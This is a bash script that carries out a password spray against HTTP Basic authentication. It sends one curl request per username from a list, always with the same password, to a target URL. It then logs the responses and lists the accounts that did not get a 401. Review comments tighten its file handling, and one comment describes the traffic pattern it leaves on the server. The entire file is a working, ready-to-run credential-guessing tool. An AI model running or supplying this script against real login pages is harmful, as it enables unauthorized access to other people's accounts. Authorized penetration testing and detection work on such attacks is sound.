#!/bin/bash

#########################################################################################
# Here is a simple password spray for a basic auth attack                               #
#                                                                                       #
# Usage thisscript.sh pathof_usernames.txt password_to_try URL                          #
# I.e. ./thisscript.sh /tmp/usernames.txt Summer2019 https://website.com/login.php      #
#########################################################################################

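# Sends one HTTP Basic authentication request per username in the input file,
# always with the same password, and records "username,size,status line" for
# each attempt in /tmp/password_spray_results.txt.
#
# Arguments: $1 - file with one username per line
#            $2 - password sent with every username
#            $3 - URL the requests are sent to
# Exit codes: 9 bad usage, 99 username file missing, 1 scratch/result file
#             could not be created, 0 otherwise.
#
# On the server side this traffic is a run of Basic-auth attempts that share
# one password across many usernames from a single client, i.e. a burst of
# 401 responses spread over accounts rather than concentrated on one.

script=$(basename -- "$0")
readonly results=/tmp/password_spray_results.txt

if [[ -z $1 || -z $2 || -z $3 ]]; then
  # A failing `clear` (no TERM) must not swallow the usage text.
  clear 2>/dev/null || true
  echo "You failed to execute this script correctly:
 Usage thisscript.sh pathof_usernames.txt password_to_try URL
 I.e $(pwd)/${script} /tmp/usernames.txt Summer2019 https://website.com/login.php"

  exit 9
fi

INPUT=$1
password=$2
target=$3

[[ -f "$INPUT" ]] || { echo "$INPUT file not found"; exit 99; }

# The results hold working credentials, so keep every file we create private.
umask 077

# The results path is fixed and lives in a world-writable directory: remove any
# old copy and create it with noclobber so a pre-placed symlink or another
# user's file is refused instead of being truncated and written through.
rm -f -- "$results"
if ! ( set -o noclobber; : > "$results" ) 2>/dev/null; then
  echo "cannot safely create $results" >&2
  exit 1
fi

# Per-request response headers go to a private scratch file rather than a
# fixed name in the current directory.
headers=$(mktemp) || { echo "mktemp failed" >&2; exit 1; }
trap 'rm -f -- "$headers"' EXIT

# IFS=, is kept from the original; it is scoped to `read` so the rest of the
# script is unaffected. -r keeps backslashes (DOMAIN\user) intact, and the
# `|| [[ -n ... ]]` arm picks up a last line that has no trailing newline.
while IFS=, read -r useraccount || [[ -n $useraccount ]]; do
  [[ -n $useraccount ]] || continue

  # Empty the scratch file first: if the request fails, nothing is written and
  # the previous account's headers would otherwise be recorded for this one.
  : > "$headers"

  # NOTE(review): the username:password pair is passed on curl's command line,
  # so it is visible in the process list to other local users while the request
  # runs. With an http:// URL it also crosses the network unencrypted.
  # stderr is discarded: the original saved curl's verbose trace (which
  # includes the Authorization header) to disk and never read it.
  curl -s -IL --user "${useraccount}:${password}" -o "$headers" \
    --url "$target" 2>/dev/null </dev/null

  size=$(stat --printf="%s" "$headers")
  # Last status line wins because -L follows redirects.
  code=$(grep '^HTTP/' "$headers" | tail -1)
  code=${code%$'\r'} # header lines end in CRLF; keep the CSV clean

  printf '%s,%s,%s\n' "$useraccount" "$size" "$code" >>"$results"
done <"$INPUT"

echo "The below user accounts have a password of ${password}"
# A row is listed only when a status line was received and it is not a 401.
# The numeric check is needed because HTTP/2 status lines carry no
# "Unauthorized" reason phrase; rows with no status line are failed requests.
# NOTE(review): any other status (403, 404, 5xx, a redirect target) is still
# listed, so entries here need manual confirmation before being reported.
awk -F',' '
  !/Unauthorized/ && $NF ~ /^HTTP\// && $NF !~ /^HTTP\/[0-9.]+ 401( |$)/ {
    print $1
  }' "$results"
echo "See results in /tmp/password_spray_results.txt file"

exit 0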